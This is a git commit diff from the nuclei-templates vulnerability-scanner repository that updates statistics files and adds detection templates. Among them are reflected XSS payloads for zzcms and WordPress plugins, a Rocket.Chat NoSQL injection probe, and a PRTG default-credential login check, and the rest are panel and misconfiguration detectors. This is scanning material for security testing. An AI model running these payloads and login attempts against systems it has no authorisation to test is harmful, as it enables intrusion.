Merge branch 'projectdiscovery:master' into master
commit
0d5ed545fb
|
@ -1,26 +0,0 @@
|
|||
cves/2016/CVE-2016-10368.yaml
|
||||
cves/2017/CVE-2017-17736.yaml
|
||||
cves/2019/CVE-2019-8086.yaml
|
||||
cves/2020/CVE-2020-13820.yaml
|
||||
cves/2020/CVE-2020-2733.yaml
|
||||
cves/2021/CVE-2021-25104.yaml
|
||||
cves/2021/CVE-2021-36873.yaml
|
||||
cves/2022/CVE-2022-2546.yaml
|
||||
cves/2022/CVE-2022-2551.yaml
|
||||
cves/2022/CVE-2022-2633.yaml
|
||||
cves/2022/CVE-2022-31814.yaml
|
||||
default-logins/aem/aem-felix-console.yaml
|
||||
default-logins/oracle/peoplesoft-default-login.yaml
|
||||
exposed-panels/aircube-login.yaml
|
||||
exposed-panels/oracle-business-intelligence.yaml
|
||||
exposed-panels/webpagetest-panel.yaml
|
||||
exposures/files/sendgrid-env.yaml
|
||||
file/bash/bash.yaml
|
||||
misconfiguration/aem/aem-bulkeditor.yaml
|
||||
misconfiguration/aem/aem-custom-script.yaml
|
||||
misconfiguration/aem/aem-dump-contentnode.yaml
|
||||
technologies/moveit-transfer-detect.yaml
|
||||
technologies/oracle/oracle-access-manager-detect.yaml
|
||||
technologies/zend-server-test-page.yaml
|
||||
vulnerabilities/other/webpagetest-ssrf.yaml
|
||||
vulnerabilities/wordpress/age-gate-xss.yaml
|
22
README.md
22
README.md
|
@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
|
|||
|
||||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
||||
| cve | 1444 | daffainfo | 631 | cves | 1421 | info | 1482 | http | 3894 |
|
||||
| panel | 663 | dhiyaneshdk | 594 | exposed-panels | 670 | high | 1031 | file | 76 |
|
||||
| edb | 565 | pikpikcu | 329 | vulnerabilities | 513 | medium | 818 | network | 52 |
|
||||
| lfi | 513 | pdteam | 269 | technologies | 283 | critical | 483 | dns | 17 |
|
||||
| xss | 496 | geeknik | 192 | exposures | 280 | low | 228 | | |
|
||||
| wordpress | 422 | dwisiswant0 | 169 | misconfiguration | 240 | unknown | 11 | | |
|
||||
| exposure | 415 | 0x_akoko | 166 | token-spray | 230 | | | | |
|
||||
| cve2021 | 353 | princechaddha | 151 | workflows | 190 | | | | |
|
||||
| rce | 338 | ritikchaddha | 137 | default-logins | 103 | | | | |
|
||||
| wp-plugin | 319 | pussycat0x | 133 | file | 76 | | | | |
|
||||
| cve | 1459 | daffainfo | 633 | cves | 1438 | info | 1491 | http | 3929 |
|
||||
| panel | 667 | dhiyaneshdk | 606 | exposed-panels | 674 | high | 1066 | file | 77 |
|
||||
| edb | 573 | pikpikcu | 329 | vulnerabilities | 515 | medium | 776 | network | 52 |
|
||||
| lfi | 513 | pdteam | 270 | technologies | 287 | critical | 513 | dns | 17 |
|
||||
| xss | 504 | geeknik | 193 | exposures | 281 | low | 228 | | |
|
||||
| wordpress | 430 | dwisiswant0 | 169 | misconfiguration | 246 | unknown | 14 | | |
|
||||
| exposure | 419 | 0x_akoko | 167 | token-spray | 230 | | | | |
|
||||
| cve2021 | 356 | princechaddha | 151 | workflows | 190 | | | | |
|
||||
| rce | 340 | ritikchaddha | 138 | default-logins | 106 | | | | |
|
||||
| wp-plugin | 327 | pussycat0x | 135 | file | 77 | | | | |
|
||||
|
||||
**297 directories, 4270 files**.
|
||||
**299 directories, 4307 files**.
|
||||
|
||||
</td>
|
||||
</tr>
|
||||
|
|
File diff suppressed because one or more lines are too long
3973
TEMPLATES-STATS.md
3973
TEMPLATES-STATS.md
File diff suppressed because it is too large
Load Diff
20
TOP-10.md
20
TOP-10.md
|
@ -1,12 +1,12 @@
|
|||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
||||
| cve | 1444 | daffainfo | 631 | cves | 1421 | info | 1482 | http | 3894 |
|
||||
| panel | 663 | dhiyaneshdk | 594 | exposed-panels | 670 | high | 1031 | file | 76 |
|
||||
| edb | 565 | pikpikcu | 329 | vulnerabilities | 513 | medium | 818 | network | 52 |
|
||||
| lfi | 513 | pdteam | 269 | technologies | 283 | critical | 483 | dns | 17 |
|
||||
| xss | 496 | geeknik | 192 | exposures | 280 | low | 228 | | |
|
||||
| wordpress | 422 | dwisiswant0 | 169 | misconfiguration | 240 | unknown | 11 | | |
|
||||
| exposure | 415 | 0x_akoko | 166 | token-spray | 230 | | | | |
|
||||
| cve2021 | 353 | princechaddha | 151 | workflows | 190 | | | | |
|
||||
| rce | 338 | ritikchaddha | 137 | default-logins | 103 | | | | |
|
||||
| wp-plugin | 319 | pussycat0x | 133 | file | 76 | | | | |
|
||||
| cve | 1459 | daffainfo | 633 | cves | 1438 | info | 1491 | http | 3929 |
|
||||
| panel | 667 | dhiyaneshdk | 606 | exposed-panels | 674 | high | 1066 | file | 77 |
|
||||
| edb | 573 | pikpikcu | 329 | vulnerabilities | 515 | medium | 776 | network | 52 |
|
||||
| lfi | 513 | pdteam | 270 | technologies | 287 | critical | 513 | dns | 17 |
|
||||
| xss | 504 | geeknik | 193 | exposures | 281 | low | 228 | | |
|
||||
| wordpress | 430 | dwisiswant0 | 169 | misconfiguration | 246 | unknown | 14 | | |
|
||||
| exposure | 419 | 0x_akoko | 167 | token-spray | 230 | | | | |
|
||||
| cve2021 | 356 | princechaddha | 151 | workflows | 190 | | | | |
|
||||
| rce | 340 | ritikchaddha | 138 | default-logins | 106 | | | | |
|
||||
| wp-plugin | 327 | pussycat0x | 135 | file | 77 | | | | |
|
||||
|
|
|
@ -0,0 +1,43 @@
|
|||
id: CVE-2020-20285
|
||||
|
||||
info:
|
||||
name: zzcms - Reflected XSS
|
||||
author: edoardottt
|
||||
severity: medium
|
||||
description: |
|
||||
There is a XSS in the user login page in zzcms 2019. Users can inject js code by the referer header via user/login.php
|
||||
reference:
|
||||
- https://github.com/iohex/ZZCMS/blob/master/zzcms2019_login_xss.md
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-20285
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 5.4
|
||||
cve-id: CVE-2020-20285
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
fofa-query: zzcms
|
||||
verified: "true"
|
||||
tags: cve,cve2020,zzcms,xss
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /user/login.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Referer: xss"/><img src="#" onerror="alert(document.domain)"/>
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'fromurl" type="hidden" value="xss"/><img src="#" onerror="alert(document.domain)"/>'
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -7,7 +7,7 @@ info:
|
|||
description: WordPress Contact Form 7 before 5.3.2 allows unrestricted file upload and remote code execution because a filename may contain special characters.
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-35489
|
||||
- https://www.getastra.com/blog/911/plugin-exploit/contact-form-7-unrestricted-file-upload/
|
||||
- https://web.archive.org/web/20210125141546/https://www.getastra.com/blog/911/plugin-exploit/contact-form-7-unrestricted-file-upload-vulnerability/
|
||||
- https://wordpress.org/plugins/contact-form-7/#developers
|
||||
- https://www.jinsonvarghese.com/unrestricted-file-upload-in-contact-form-7/
|
||||
classification:
|
||||
|
|
|
@ -24,17 +24,19 @@ requests:
|
|||
- '{{BaseURL}}/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin'
|
||||
- '{{BaseURL}}/jira/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin'
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'rel=\"admin\"'
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- 'application/json'
|
||||
part: header
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
|
|
@ -0,0 +1,49 @@
|
|||
id: CVE-2021-22911
|
||||
info:
|
||||
name: RocketChat - NoSQL injection
|
||||
author: tess,sullo
|
||||
severity: critical
|
||||
description: Rocket.Chat server versions 3.11, 3.12 and 3.1 allow unauthenticated access to an API endpoint which leads to NoSQL injection in the database.
|
||||
reference:
|
||||
- http://packetstormsecurity.com/files/162997/Rocket.Chat-3.12.1-NoSQL-Injection-Code-Execution.html
|
||||
- https://github.com/vulhub/vulhub/tree/master/rocketchat/CVE-2021-22911
|
||||
- https://hackerone.com/reports/1130721
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-22911
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22911
|
||||
- https://blog.sonarsource.com/nosql-injections-in-rocket-chat
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2021-22911
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
shodan-query: http.title:"Rocket.Chat"
|
||||
verified: "true"
|
||||
tags: rocketchat,nosqli,packetstorm,vulhub,hackerone,cve,cve2021
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |-
|
||||
POST /api/v1/method.callAnon/getPasswordPolicy HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/json
|
||||
|
||||
{"message": "{\"msg\":\"method\", \"method\": \"getPasswordPolicy\", \"params\": [{\"token\": {\"$regex\": \"^{{randstr}}\"}}] }"}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '[error-invalid-user]'
|
||||
- '"success":true'
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- application/json
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,43 @@
|
|||
id: CVE-2022-1910
|
||||
|
||||
info:
|
||||
name: Shortcodes and extra features for Phlox theme < 2.9.8 - Cross-Site-Scripting
|
||||
author: Akincibor
|
||||
severity: medium
|
||||
description: |
|
||||
The plugin does not sanitise and escape a parameter before outputting it back in the response, leading to a Reflected Cross-Site Scripting.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/8afe1638-66fa-44c7-9d02-c81573193b47
|
||||
- https://wordpress.org/plugins/auxin-elements/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-1910
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2022-1910
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: wordpress,xss,auxin-elements,wpscan,cve,cve2017,wp-plugin,wp
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-admin/admin-ajax.php?action=aux_the_recent_products&data[wp_query_args][post_type]=post&data[title]=%3Cscript%3Ealert(document.domain)%3C/script%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'widget-title"><script>alert(document.domain)</script></h3>'
|
||||
- 'aux-widget'
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -18,7 +18,7 @@ info:
|
|||
cwe-id: CWE-77
|
||||
metadata:
|
||||
shodan-query: http.component:"BitBucket"
|
||||
tags: cve,cve2022,bitbucket,atlassian
|
||||
tags: cve,cve2022,bitbucket,atlassian,kev
|
||||
|
||||
variables:
|
||||
data: '{{rand_base(5)}}'
|
||||
|
|
|
@ -0,0 +1,45 @@
|
|||
id: CVE-2022-38553
|
||||
|
||||
info:
|
||||
name: Academy Learning Management System < v5.9.1 - Reflected XSS
|
||||
author: edoardottt
|
||||
severity: medium
|
||||
description: |
|
||||
Academy Learning Management System before v5.9.1 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the Search parameter.
|
||||
reference:
|
||||
- https://www.youtube.com/watch?v=yFiZffHoeKs&ab_channel=4websecurity
|
||||
- https://github.com/4websecurity/CVE-2022-38553
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-38553
|
||||
- https://codecanyon.net/item/academy-course-based-learning-management-system/22703468
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2022-38553
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
google-query: intext:"Study any topic, anytime"
|
||||
verified: "true"
|
||||
tags: cve,cve2022,academylms,xss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/search?query=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"><script>alert(document.domain)</script>'
|
||||
- 'Study any topic'
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- 'text/html'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,43 @@
|
|||
id: prtg-default-login
|
||||
|
||||
info:
|
||||
name: PRTG Network Monitor Default Login
|
||||
author: johnk3r
|
||||
severity: high
|
||||
description: PRTG default admin credentials were discovered.
|
||||
reference:
|
||||
- https://www.paessler.com/manuals/prtg/login
|
||||
classification:
|
||||
cwe-id: CWE-798
|
||||
metadata:
|
||||
shodan-query: http.favicon.hash:-655683626
|
||||
tags: prtg,default-login
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /public/checklogin.htm HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
loginurl=&username={{username}}&password={{password}}
|
||||
|
||||
attack: pitchfork
|
||||
payloads:
|
||||
username:
|
||||
- prtgadmin
|
||||
password:
|
||||
- prtgadmin
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "OCTOPUS"
|
||||
- "/home"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 302
|
|
@ -0,0 +1,30 @@
|
|||
id: remedy-axis-login
|
||||
|
||||
info:
|
||||
name: Remedy Axis Login
|
||||
author: tess
|
||||
severity: info
|
||||
metadata:
|
||||
shodan-query: http.html:"BMC Remedy"
|
||||
verified: true
|
||||
tags: panel,remedy,bmc
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}'
|
||||
- '{{BaseURL}}/arsys/shared/login.jsp'
|
||||
- '{{BaseURL}}/rsso/admin/'
|
||||
|
||||
stop-at-first-match: true
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "BMC Remedy Mid Tier "
|
||||
- "Remedy Login Page"
|
||||
- "BMC Remedy"
|
||||
- "BMC Smart Reporting"
|
||||
condition: or
|
|
@ -0,0 +1,33 @@
|
|||
id: somansa-dlp-detect
|
||||
|
||||
info:
|
||||
name: Somansa DLP Center Detection
|
||||
author: gy741,ritikchaddha
|
||||
severity: info
|
||||
reference:
|
||||
- https://www.somansa.com/solution/integrated_solution/dlp/
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: http.html:"DLP system"
|
||||
tags: panel,somansa,dlp
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/DLPCenter/loginform.sms"
|
||||
- "{{BaseURL}}/DLPCenter/images/favicon.ico"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: or
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "/DLPCenter/js/"
|
||||
- "SOMANSA"
|
||||
condition: and
|
||||
case-insensitive: true
|
||||
|
||||
- type: dsl
|
||||
dsl:
|
||||
- "status_code==200 && (\"-1217239281\" == mmh3(base64_py(body)))"
|
|
@ -0,0 +1,26 @@
|
|||
id: wampserver-homepage
|
||||
|
||||
info:
|
||||
name: WAMPSERVER Homepage
|
||||
author: DhiyaneshDk
|
||||
severity: info
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: title:"WAMPSERVER Homepage"
|
||||
tags: panel,wampserver
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "<title>WAMPSERVER Homepage</title>"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,20 +0,0 @@
|
|||
id: xenforo-login
|
||||
|
||||
info:
|
||||
name: XenForo Login/Register
|
||||
author: dhiyaneshDk
|
||||
severity: info
|
||||
metadata:
|
||||
shodan-query: http.title:"XenForo"
|
||||
tags: panel
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/index.php'
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '<title>XenForo</title>'
|
||||
condition: and
|
|
@ -1,13 +1,14 @@
|
|||
id: hp-color-laserjet-detect
|
||||
|
||||
info:
|
||||
name: HP Color LaserJet detection
|
||||
name: HP Color LaserJet Detection
|
||||
author: idealphase,gy741
|
||||
severity: info
|
||||
reference:
|
||||
- http://www.hp.com/
|
||||
- https://www.hp.com/us-en/shop/cv/printers
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: http.title:"HP Color LaserJet"
|
||||
google-query: intitle:"HP Color LaserJet"
|
||||
tags: iot,hp
|
||||
|
@ -16,15 +17,21 @@ requests:
|
|||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
- "{{BaseURL}}/hp/device/this.LCDispatcher"
|
||||
|
||||
stop-at-first-match: true
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "<title>HP Color LaserJet"
|
||||
- "HP Color LaserJet"
|
||||
- '<td class="mastheadTitle"><h1>HP Color LaserJet'
|
||||
- '<strong class="product">HP Color LaserJet'
|
||||
- '<a href="info_deviceStatus.html?'
|
||||
condition: or
|
||||
|
||||
- type: status
|
||||
status:
|
||||
|
|
|
@ -16,7 +16,7 @@ requests:
|
|||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/content.infinity.json"
|
||||
- "{{BaseURL}}{{path}}"
|
||||
- "{{BaseURL}}/{{path}}"
|
||||
|
||||
iterate-all: true
|
||||
extractors:
|
||||
|
|
|
@ -0,0 +1,33 @@
|
|||
id: atlassian-bamboo-build
|
||||
|
||||
info:
|
||||
name: Atlassian Bamboo Build Dashboard
|
||||
author: DhiyaneshDK
|
||||
severity: unknown
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: title:"Build Dashboard - Atlassian Bamboo"
|
||||
tags: misconfig,atlassian,bamboo
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/allPlans.action"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<th>Project</th>"
|
||||
- "<th>Plan</th>"
|
||||
- "<th>Build</th>"
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,38 @@
|
|||
id: gitea-public-signup
|
||||
|
||||
info:
|
||||
name: Gitea Public Registration Enabled
|
||||
author: edoardottt
|
||||
severity: high
|
||||
description: |
|
||||
A misconfiguration in Gitea allows arbitrary users to sign up and read code hosted on the service.
|
||||
reference:
|
||||
- https://www.youtube.com/watch?v=oHhofSj9lEM&t=157s
|
||||
- https://gitea.io/en-us/
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: html:"Powered by Gitea"
|
||||
tags: misconfig,gitea
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/user/sign_up'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- 'Powered by Gitea Version'
|
||||
- 'Register -'
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "Registration is disabled. Please contact your site administrator."
|
||||
negative: true
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,30 @@
|
|||
id: unauth-kubecost
|
||||
info:
|
||||
name: KubeCost - Unauthenticated Dashboard Exposure
|
||||
author: pussycat0x
|
||||
severity: medium
|
||||
reference: https://www.facebook.com/photo?fbid=470414125129112&set=pcb.470413798462478
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: title:kubecost
|
||||
tags: misconfig,exposure,unauth,kubecost
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/overview.html'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '<title>Cluster Overview | Kubecost</title>'
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -15074,4 +15074,9 @@ requests:
|
|||
words:
|
||||
- Powered by <a href='http://zzzcms.com'>ZZZcms</a>
|
||||
|
||||
- type: word
|
||||
name: bitwarden
|
||||
words:
|
||||
- <title page-title>Bitwarden Web Vault</title>
|
||||
|
||||
# Enhanced by cs on 2022/02/08
|
||||
|
|
|
@ -13,6 +13,7 @@ requests:
|
|||
path:
|
||||
- '{{BaseURL}}/oamfed/idp/soap'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
|
|
|
@ -0,0 +1,27 @@
|
|||
id: xenforo-detect
|
||||
|
||||
info:
|
||||
name: XenForo Forum Detection
|
||||
author: dhiyaneshDk,daffainfo
|
||||
severity: info
|
||||
metadata:
|
||||
shodan-query: http.title:"XenForo"
|
||||
tags: tech,xenforo
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/index.php'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '<html id="XenForo"'
|
||||
- '<html id="XF"'
|
||||
condition: or
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,34 @@
|
|||
id: unauthenticated-duplicator-disclosure
|
||||
|
||||
info:
|
||||
name: WordPress Duplicator Plugin - Information disclosure
|
||||
author: tess
|
||||
severity: medium
|
||||
description: |
|
||||
Unauthenticated Information disclosure of Duplicator WordPress plugin sensitive files.
|
||||
metadata:
|
||||
verified: true
|
||||
tags: wordpress,wp,wp-plugin,misconfig,disclosure,unauth,exposure
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/backups-dup-lite/tmp/"
|
||||
- "{{BaseURL}}/wp-content/backups-dup-lite"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'Index of /wp-content/backups-dup-lite/'
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- 'text/html'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
Loading…
Reference in New Issue